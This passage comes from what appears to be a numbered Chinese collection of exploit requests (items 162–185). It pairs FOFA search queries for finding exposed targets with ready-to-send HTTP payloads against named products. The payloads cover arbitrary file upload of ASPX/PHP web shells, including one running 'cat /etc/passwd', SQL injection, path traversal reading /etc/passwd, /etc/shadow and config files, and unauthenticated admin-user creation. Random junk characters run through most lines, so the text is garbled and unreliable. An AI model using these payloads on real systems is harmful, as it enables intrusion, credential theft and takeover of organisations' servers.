- a% X& S3 Z# o$ {: _</soap:Envelope>' R3 j5 k! N4 k
# }- i! i- W+ G) L. S4 ~+ o2 b3 f+ s) H4 L/ t
http://x.x.x.x/dizxdell.aspx
1 y0 i: f$ s1 U6 c% n" n8 d) n! c2 A# r! T3 o3 m
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
) h, Q+ }( c# U4 DFOFA: app="和丰山海-数字标牌"
2 i6 Y, `! Y. E. V. OPOST /QH.aspx HTTP/1.11 r6 o* p. F/ v b1 p# a" H" A& u1 A
Host: x.x.x.x' J1 ?5 e: u* U+ g0 z; r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0$ \2 z# V7 Y# T6 x) J6 V( w
Connection: close
% h; @, ]4 P, F6 t9 M" E2 M/ E' bContent-Length: 5834 A% Z( g$ `8 O5 D$ K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
# y( X. b8 L6 q4 O# P: KAccept-Encoding: gzip
$ l h& R4 h- {0 t# y& `2 A3 @+ V- k6 S v
------WebKitFormBoundaryeegvclmyurlotuey/ x7 v( ]6 M) x1 W) y
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"1 U+ X2 I& Q7 D3 m3 m
Content-Type: application/octet-stream
4 V! _+ a f1 f
$ Q9 n9 W7 {! b& x7 p( C0 Z+ a) l* {<% response.write("ujidwqfuuqjalgkvrpqy") %>
; _. P! o. b/ h. c------WebKitFormBoundaryeegvclmyurlotuey2 J+ r, w$ ^4 k5 h, j3 ~' {
Content-Disposition: form-data; name="action"
* J% h9 p) [% g7 n, o6 Q6 A
8 S8 h5 G5 c+ tupload9 T8 _, |8 r0 s
------WebKitFormBoundaryeegvclmyurlotuey
# p) p% l3 _( N7 k1 @/ {, ^Content-Disposition: form-data; name="responderId" D6 S% K% I f! R
$ y' `* s5 p& j' C8 }% e# ]ResourceNewResponder8 |: [9 v- C6 {6 S. c7 y2 n
------WebKitFormBoundaryeegvclmyurlotuey
( O% ?; B% C6 V6 G- P# V, C5 D0 LContent-Disposition: form-data; name="remotePath"% L9 B" q) M2 o( r
" ?# z7 B$ X7 N f1 w! S4 L/opt/resources
7 ^" F" a/ e7 ^" s, F- }( w------WebKitFormBoundaryeegvclmyurlotuey--5 v7 [, `0 l1 F+ t0 W$ ]
4 ]' p0 D" ~* S
! {( F- |. _- x/ T% S1 k# R9 ^http://x.x.x.x/opt/resources/kjuhitjgk.aspx
8 C; {4 X/ i' k x7 l) k! J
$ f) A Q- [/ `3 d0 E163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" V; G6 [* l, B, o" ?: ]$ J% jFOFA: icon_hash="-795291075"
- ] i& C( Z( x1 dPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
* i; B: @2 t. ~- kHost: x.x.x.x' Q0 w$ o. o& e9 _1 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.369 B% e" F$ u! j1 A' m
Connection: close
. i' ^9 S) x2 P# [Content-Length: 2939 H& V: r( Q! m
Accept: */*: O# y& Y7 ^% Z+ O( n3 g ~/ V8 J
Accept-Encoding: gzip, deflate
! N( R/ H& }9 A4 E6 M9 }Accept-Language: zh-CN,zh;q=0.9# X3 ?5 U2 P; g' l8 q6 T
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
. y$ v% k" \$ T8 l( D) F. T5 ]1 O% J1 h) H
------iiqvnofupvhdyrcoqyuujyetjvqgocod
, u$ _9 A p0 VContent-Disposition: form-data; name="name"/ ]5 [; [" @4 Q- d9 h; x e
. u* `& R' J" N4 }1 H! `1.php% W8 l- M% [& G& ~( p
------iiqvnofupvhdyrcoqyuujyetjvqgocod
* @2 {3 k: t1 {6 | R- sContent-Disposition: form-data; name="upfile"; filename="1.php"
7 k, u6 `& }5 o& _Content-Type: image/jpeg
. c* c+ H5 ^$ G0 o
4 g. k4 \7 I+ j% trvjhvbhwwuooyiioxega
; h4 F9 E& {4 L/ Y1 ~$ |! n5 C0 X: J------iiqvnofupvhdyrcoqyuujyetjvqgocod--+ n7 _5 f& N4 E3 `3 G( n; o
3 O/ w( x3 S, y& Y4 b: H5 a
* F. T Y: k7 A4 J164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 F* A- _# U6 KFOFA: title="智慧综合管理平台登入"
$ ?" B+ x2 Q- a* n! _$ |" L8 NPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
+ [0 a( l$ l0 s" d- T, WHost: x.x.x.x
+ I @% ? }' D/ N! _; X6 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.08 L, x( K/ e0 r: b1 w
Content-Length: 2885 h: |( n9 c; T/ i
Accept: application/json, text/javascript, */*; q=0.012 X/ Z0 H2 U/ b/ u0 s* T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
5 x3 ?7 b$ N) }- aConnection: close
2 V! y! R- o& F" I9 l+ MContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
# ^# Z* v, _; FX-Requested-With: XMLHttpRequest: E$ Y2 R+ y' C. Q Q3 H
Accept-Encoding: gzip
& l4 k. Q2 O- }: l" ?7 y
; l' T2 T# X, Z. w( i$ t# ]0 z------dqdaieopnozbkapjacdbdthlvtlyl
% n: K5 u5 R* d3 ZContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"+ F- F& v. R+ Z+ f; w- v( u' y
Content-Type: image/jpeg
. `) Y) Q) k% a' \9 M* V, U5 ]
5 m2 M/ k+ [/ d0 u4 U1 {. Z c8 _<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%># U$ M8 J: O P% y: U6 o! \3 z) B$ o
------dqdaieopnozbkapjacdbdthlvtlyl--6 @. a. _# Q. x. ]5 o
0 ~% H" f- U" U
% K4 r3 G/ L0 [1 \7 g# L/ A/ P6 L
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' i. n5 } ?1 H) L \& P2 h! l7 P
5 X9 f4 T$ f3 \7 X* G
165. OrangeHRM 3.3.3 SQL 注入% R: P7 x8 J' R: H( h8 j n
CVE-2024-36428+ }. O" i0 N7 { [) Z' h
FOFA: app="OrangeHRM-产品"* G( l0 g8 L+ c$ e/ G4 h
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
5 @/ @5 G' n3 G5 [
2 B7 x3 ^4 a# f0 q# j
4 y; |. o3 ~4 e, w, z9 C166. 中成科信票务管理平台SeatMapHandler SQL注入& I9 E( }* c) l; p& j
FOFA:body="技术支持:北京中成科信科技发展有限公司"
7 X% T. L- k" d) k% y# Z% X8 HPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.15 ^, _ e1 @: J$ i
Host:+ f4 X S$ x$ b. |# s
Pragma: no-cache
. r' ~" G/ y; TCache-Control: no-cache
% b, w4 h5 W$ t' d8 YUpgrade-Insecure-Requests: 1
m$ b; `- [& S2 L' c# Y- JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ F' R8 z! s) @% I1 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 b% S( X6 [$ @4 s
Accept-Encoding: gzip, deflate
0 A3 M! ~: m8 H( w6 F6 a2 m2 bAccept-Language: zh-CN,zh;q=0.9,en;q=0.8- ]0 A' S: {7 \$ `4 `
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE8 f% I ~ p V% d
Connection: close
: J/ j% q0 F) X$ J4 W9 BContent-Type: application/x-www-form-urlencoded
: \9 n8 q( r; r+ @- EContent-Length: 89
* k2 w% ^1 }! ^4 t2 \2 R! D" q+ [& D9 U8 @$ L! x8 D
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
! ?6 @6 Y6 ^" x1 h" Y8 P7 U& ] y! x3 u4 |" z1 U- ]* M/ [- A0 l' C
9 m) l: D% M4 N1 y- X* ?( B! G! G167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ N' f' F, o7 s* T* t! @! ^/ pFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
% `& \) ^1 f2 x2 }+ K( X/ }GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
4 @. T% M2 D# F% {Host:/ [! ]. ]/ ?: `) d, p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 X, `: I% [( zContent-Type: application/x-www-form-urlencoded3 A. @: U; E3 [3 K" U4 L( a
Accept-Encoding: gzip, deflate/ M8 M8 P$ p- l1 _' D7 |7 ?; j
Accept: */*
5 d* m2 x# U4 _7 i0 PConnection: keep-alive0 D& h0 w0 W+ F8 K) K" g
3 f, \8 x$ V7 }$ @1 ]
9 y- g, h9 Y& f( z, m
168. 宏景EHR OutputCode 任意文件读取
5 G6 u5 h ]1 m/ z6 k4 eFOFA:app="HJSOFT-HCM"
7 i7 C5 J( _* I. h+ {% fGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
2 m/ z6 h: }$ eHost: your-ip
, o1 m) ?- K- U# J5 w/ b# CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
" n9 E" x4 D0 O! Y. ^; tContent-Type: application/x-www-form-urlencoded1 ^) z+ A4 O( N
Connection: close0 O) ]9 ~4 K F+ A1 c
% @& ]+ s* O# W
5 I1 K$ e4 Q, d' P H8 f a6 e3 L. p
169. 宏景EHR downlawbase SQL注入
6 a2 g4 Y- `7 L$ u- d, X3 d4 a3 TFOFA:app="HJSOFT-HCM"
: Y" S/ W8 q) Y, d3 {( z* Q4 ?GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.11 U0 K. i) M# n
Host: your-ip: A/ _( W: \' [* k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ f2 l; e0 W8 {0 V7 ^$ _; R' YAccept: */*
! U' e: \0 }+ s" NAccept-Encoding: gzip, deflate6 r1 {1 m+ E3 F8 H9 T
Connection: close$ y, A ~% D! H/ r; s
1 ^' p% T, \0 v+ c. k
5 ~$ K# B' I$ U/ b, p. w, h8 {& B, q6 x ` e' Z9 i% a
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
+ L" a! @/ y' Z$ `FOFA:body="/general/sys/hjaxmanage.js"4 g3 V& g5 P p
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.14 V9 r, T" t( [
Host: balalanengliang) r1 b2 B, I: I# i3 O9 i( U
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) Z. m: E* `1 _+ j5 h5 p8 ]
Content-Type: application/x-www-form-urlencoded
$ w5 F& K5 ]; L4 D6 m1 v
1 {0 ?! o* d6 e7 Q" A+ n9 ufilename=../webapps/ROOT/WEB-INF/web.xml% k# ~, `. G% t* _& Z; ]
* m3 _+ A# I0 c* j9 ^1 E) y) U% `# M- n% R% K- z. H# g- Z
171. 通天星CMSV6车载定位监控平台 SQL注入
- S8 J4 V% Z, U, v6 eFOFA:body="/808gps/"
. V9 G5 _7 k( f/ zGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
+ r" H7 D" P/ X, f: xHost: your-ip: H: Z# P$ H$ o$ `; ~/ }' c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
$ p, L( x$ C* L' Y {( c& JAccept: */*
+ {7 N" M1 P+ P# IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! o( S N: J+ ]0 Y- q
Accept-Encoding: gzip, deflate
. F6 A/ H. ^$ \+ WConnection: close4 w2 j6 l4 ?9 V, R0 C! v
1 D2 P4 r3 O5 I' f S, q8 I
! n+ e" ~' R* y1 G5 l! o! W5 D* C- b6 e+ i$ ^# l$ v
172. DT-高清车牌识别摄像机任意文件读取2 q4 b% R) @- y
FOFA:app="DT-高清车牌识别摄像机"
8 a8 l# Y$ @5 nGET /../../../../etc/passwd HTTP/1.1
+ K' k/ E( g" R* YHost: your-ip
4 x3 H; w0 j, B/ r( XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 N; c# q) A% F: y X: z
Accept-Encoding: gzip, deflate
% v9 s E, B& f) |: ]. mAccept: */*& w# u" N" ~4 A
Connection: keep-alive5 ?7 G! b- J0 [& J. U6 E( N) L6 }" z- L
/ L) S1 R& e! w e* v2 B
9 X6 ~+ s4 Z3 {1 ]2 Z/ }( |; {: S/ V" J; j+ |( F \
173. Check Point 安全网关任意文件读取 S2 f3 J% K6 J+ G( P+ D) d: Z
CVE-2024-249196 r) w% z: ?5 ~# y0 ~
FOFA:app="Check_Point-SSL-Network-Extender"
8 p6 ^$ B' H, s6 WPOST /clients/MyCRL HTTP/1.1
1 L* ~# d3 H& H. r+ QHost: your-ip1 }$ `. G# b9 R. y" @3 S- f
Content-Type: application/x-www-form-urlencoded3 h, f2 O7 g* S: g9 }7 ?* z
7 _' d& f6 D; w- N
aCSHELL/../../../../../../../etc/shadow- O, f% K; L1 x: q% u6 r
: x) b. U$ ]' s5 v4 s
" [# Q; e3 C" \* k- S' n
6 V5 n6 `* a4 [) n174. 金和OA C6 FileDownLoad.aspx 任意文件读取; J: }- Z9 @* {2 p# ^3 b
FOFA:app="金和网络-金和OA"& V5 n0 m" q- f( R5 G
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.10 \9 v# p7 _$ u' B, d1 h
Host: your-ip7 F+ V4 r& ]" P) I$ _. Q2 g: f+ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 a* I/ W# A6 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; P3 [: v5 z8 n5 M
Accept-Encoding: gzip, deflate, br+ N* a- c5 \- H2 c1 Y) N m& |
Accept-Language: zh-CN,zh;q=0.9
( f7 i. f/ H$ A1 W5 P+ m% T# DConnection: close
3 Z+ o6 o5 v9 ?
/ [* T0 c e) C# A, `% g$ E1 E! |/ h
0 w2 f) |/ A; Q175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; F1 O$ h! d7 A i. {FOFA:app="金和网络-金和OA"1 W5 O% V+ t3 J( H, }
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.13 i4 O X* X; v3 N0 W3 s$ v$ x
Host:
' z, z; {& C# c8 jUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& U7 p) r& }1 h- L0 q4 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! \+ G" s- ?, t% X7 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' L7 j" y4 f0 C7 d# |+ |2 l
Accept-Encoding: gzip, deflate
6 I! M" A) L7 ~+ zConnection: close: z: H) ?& z; V% S$ a* L$ a, Z6 U
Upgrade-Insecure-Requests: 1
& o$ o4 j P) ~( t/ X7 H- P$ i, k% A- @
8 _" R% A. b* c7 L
176. 电信网关配置管理系统 rewrite.php 文件上传0 W# s3 s+ |; h' Y2 U7 `- W
FOFA:body="img/login_bg3.png" && body="系统登录"- e. H0 A2 t, V) Y
POST /manager/teletext/material/rewrite.php HTTP/1.12 i+ D& O: _+ `
Host: your-ip
: k0 ^ A/ T1 X1 Q E7 x1 D; _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% Z$ b" J5 c' E" Q4 H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT" }9 W( x- ~* ?
Connection: close" ?( f4 k$ b r( U; Q3 m
: o/ {/ E9 l; ` v' P
------WebKitFormBoundaryOKldnDPT& ]0 i8 V1 P! `
Content-Disposition: form-data; name="tmp_name"; filename="test.php"3 E2 D- B( u) Y8 O) u6 p
Content-Type: image/png- Z. U1 ?" o9 J6 p) J$ i$ |& Y; ^
o' W) q6 W! K1 Q<?php system("cat /etc/passwd");unlink(__FILE__);?>4 A! c* t& p3 l' m9 T4 d
------WebKitFormBoundaryOKldnDPT
! W7 O, [* x U3 CContent-Disposition: form-data; name="uploadtime"9 {3 U* R3 M. e* R) c
$ e# K* v z+ T/ A! g8 m/ }$ g7 ~
7 Q" c W+ J1 @, Y0 S. d------WebKitFormBoundaryOKldnDPT--; x8 v2 n$ J* o2 j: n P% j
3 l: Q7 \7 v/ P7 g& i6 \8 g( E" j. k% F, E# R2 J, w
0 _2 A" v+ J, q4 ~$ |7 A177. H3C路由器敏感信息泄露
1 |, }0 C* L* b. P! u) Y/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 n/ F5 |5 r9 g' T5 s$ [; S4 g. E
/userLogin.asp/../actionpolicy_status/../M60.cfg7 [. s! U/ S( ~7 L3 x
/userLogin.asp/../actionpolicy_status/../GR8300.cfg. ~8 b) d6 f* @, a
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
$ ~' S& i6 ?/ k6 R/ H. s- W+ O/userLogin.asp/../actionpolicy_status/../GR3200.cfg/ i1 w3 X" J3 [/ H; q. f
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
7 F- H# c2 I# e* r7 G% q& _/ H/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg6 _# y6 m/ m$ r h# s8 R- W
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
! O) c' ?2 O# p- ]/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
, z) o) G* g E# i, B# g: u7 t/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg$ p( t' k, u. K) G) V( A
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
' ]0 m# |+ K% o/userLogin.asp/../actionpolicy_status/../ER5100.cfg: j& ?, e- F* t- G) b
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 e( f% n9 g' E% u3 p6 E8 w
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
4 k: P: g! J+ v3 @# o/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg" ^* b6 [% d$ {7 w) y
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
4 Q- H- ~' P3 N3 I' s1 v' }7 ]/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg4 t; }8 ]. @$ P
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
' I. a) a4 g- [/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg% {, `* A8 y/ o" y7 k+ G
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
# X3 @# l2 g, [6 k( a/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg$ T9 h, \- b$ S- Y5 z$ _
% j2 H; T8 R1 c' y' n
5 t# \1 Z1 p$ n: @178. H3C校园网自助服务系统-flexfileupload-任意文件上传- Y6 W% ~4 v' F- G' @
FOFA:header="/selfservice"- x% B: S" t4 [0 M5 a
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
0 F2 Q+ {8 L6 w! d& e) VHost:$ z" |. B& O( L. I: e8 v, s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. c1 I8 A) }3 d: V
Content-Length: 252
2 T( t( D( |7 J6 |: Q! jAccept-Encoding: gzip, deflate
: i4 |+ U4 `7 o0 kConnection: close5 R. s7 @: y+ G: w1 f/ u" K4 h
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l: O* a" M1 k. ?: T$ f5 O
-----------------aqutkea7vvanpqy3rh2l8 C$ s) P$ d9 Y: ^/ q# V$ j6 d
Content-Disposition: form-data; name="12234.txt"; filename="12234"1 @! r% i: s3 F# o! t4 @$ n
Content-Type: application/octet-stream
% Y; p" ?8 ]2 I0 iContent-Length: 255& d' |- w5 O, E1 }/ @& l
, E- h8 ?$ F& G3 I2 g
12234
' S, r% A" K5 C+ X; V& a-----------------aqutkea7vvanpqy3rh2l--
* D) Z8 ~8 g# c9 S3 h$ Y5 S7 [4 Q; U0 P5 ?. d1 @
! I; G( g( V7 N$ o
GET /imc/primepush/%2e%2e/flex/12234.txt8 F1 D8 N0 n: W3 S& Q) K8 \! A
7 s9 Z( j4 t9 | ~% [
$ [! C% G; [& {, @, K- p U0 i# P& H! i179. 建文工程管理系统存在任意文件读取
E, G+ p9 @) I7 f; @1 y2 GPOST /Common/DownLoad2.aspx HTTP/1.1& l& E, o9 n& p8 |# s6 C) V
Host: {{Hostname}}
! l! j& b9 ?6 T! \9 v+ w) Q# bContent-Type: application/x-www-form-urlencoded# W" H. Q& @' M- H! |
User-Agent: Mozilla/5.0
7 z- u& x) e/ s5 }2 B% e! l% f. @
" W8 k6 S# U/ n. H6 `: l/ Upath=../log4net.config&Name=
* k& i8 ?9 G- Z* ]5 U4 P8 ]) p5 f4 Z" I/ e
$ E5 X9 k% l7 Y( C I) ^2 C
180. 帮管客 CRM jiliyu SQL注入: ]3 m" P2 d- ?& | P6 A0 N# Q
FOFA:app="帮管客-CRM"
1 X. E' Q7 Q2 d" `1 k! lGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
) Y* e! E9 q! H: mHost: your-ip: O' [) \3 R: l; w- f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. V) z" h9 s; }8 T' L& ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* U/ H' u3 w4 q- O% R6 B. _Accept-Encoding: gzip, deflate
; |5 B3 T! I/ B( n0 |# B# pAccept-Language: zh-CN,zh;q=0.9" o4 e6 I9 b X" ?0 D9 k
Connection: close
: K& \3 {8 B9 L1 i- b2 I+ H( f/ o* L! K
, D7 L$ u- J. J* q: R5 ?: G; d' E" z% P1 |
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入8 x& V* Z( Y& |- }( Y
FOFA:"PDCA/js/_publicCom.js"
/ e( X0 i. w5 b5 k8 }2 F# }POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
8 \- M! ~- t2 M1 s: hHost: your-ip, \( W: D; W+ z8 ~2 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
% w3 {- c( g+ e, tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 ~0 s( n* R: D2 X% z
Accept-Encoding: gzip, deflate, br* W3 K) ]9 c. n. ~0 g
Accept-Language: zh-CN,zh;q=0.91 M$ l0 T& d$ p+ L T/ |1 W
Connection: close, P \8 y$ {# e# m' o+ F; E: f: S
Content-Type: application/x-www-form-urlencoded Y' x1 b4 W3 M' C' R! _- Y3 @
5 j7 J. h1 Y: |! L5 I0 b& ~/ i5 y$ w. v
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20, u+ d5 G+ R$ Q& U* j4 L
$ h/ u `7 U2 u1 f' u- D
9 s0 l+ i) X$ D/ D1 n; b$ F182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
. V! Y5 [) v- e7 vFOFA:"PDCA/js/_publicCom.js"- u* a$ V* r0 C: I% \3 Q
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1+ L" y/ D) ^+ B7 J. w
Host: your-ip1 _9 D8 a% ^6 C C; C m+ X5 n6 z; ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 z+ d3 h W" n4 a* x! s* AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, A& ~0 K( [6 a. d& W9 @Accept-Encoding: gzip, deflate, br' a0 d) h! E2 V; T
Accept-Language: zh-CN,zh;q=0.9
# d+ G: \$ m2 y: ]; { {Connection: close
: B$ C, Z) ]/ b% q! g( bContent-Type: application/x-www-form-urlencoded z5 G) Q' M% G5 {0 ]& ]) p; j- {$ M
: S, |* v8 _% u
. ~, L/ T9 c9 F' x: \' ~# e; n6 [
username=test1234&pwd=test1234&savedays=1
( j4 ]* f: V. u4 X# b$ F/ C/ p+ i8 j5 t( b, e3 b
+ k* A. C V8 R4 I- D2 ?6 t183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
5 u# G! ?6 m) lFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"- [' F" M' U: n+ z6 J! _7 U3 h
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.15 w- a. o3 ]. d. D1 C( n
Host: your-ip1 n" q4 Z3 n: E; Z6 k
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 f& G+ D0 |& f9 s0 {Accept-Charset: utf-83 W4 F5 T) U6 J5 L* S! d) A' c' r
Accept-Encoding: gzip, deflate( Z/ L0 M4 `% e5 d' |& b* M8 o; V
Connection: close' X4 n& Y+ q" c: x! | r
. e% W u, `4 v' ?0 D: z; G D. |; G
9 x" E: A2 K! G
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加" p) l) _' U8 \0 f0 g* W8 r
FOFA:server="SunFull-Webs"6 q& t( K! v- k0 _% a# f) Z- }
POST /soap/AddUser HTTP/1.17 J8 @' N# G! E1 v
Host: your-ip
6 T1 }: m, N& d% J- ]/ OAccept-Encoding: gzip, deflate
. P9 T* T* _( n" X$ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
[6 w7 i P7 r0 uAccept: application/xml, text/xml, */*; q=0.01
( d. z* T4 V1 ?% O; eContent-Type: text/xml; charset=utf-8' s- Q. l* X% M' e3 H; L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 {0 u- x# L( _
X-Requested-With: XMLHttpRequest
7 S' A$ j1 X9 b% A7 w, Y7 V! h
* y; S* L- [/ ~6 r( j2 g; e! k+ X/ a% k. W' E1 L& p" g; B F
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
: k4 ]# ?, P* A4 H: U: E+ f% l
% V+ O! L$ W6 b: S& q6 u4 X: \1 s0 c0 j9 ^9 T, o
185. 瑞友天翼应用虚拟化系统SQL注入0 p. X$ {8 n, W0 V
version < 7.0.5.1
: [9 K) X* q TFOFA:app="REALOR-天翼应用虚拟化系统"
+ {2 A: |* b9 }' X2 ]8 u9 NGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1+ B1 @9 i4 H) R9 G- k
Host: host
" j7 H ^. [3 B3 k& Z( {0 K X$ A
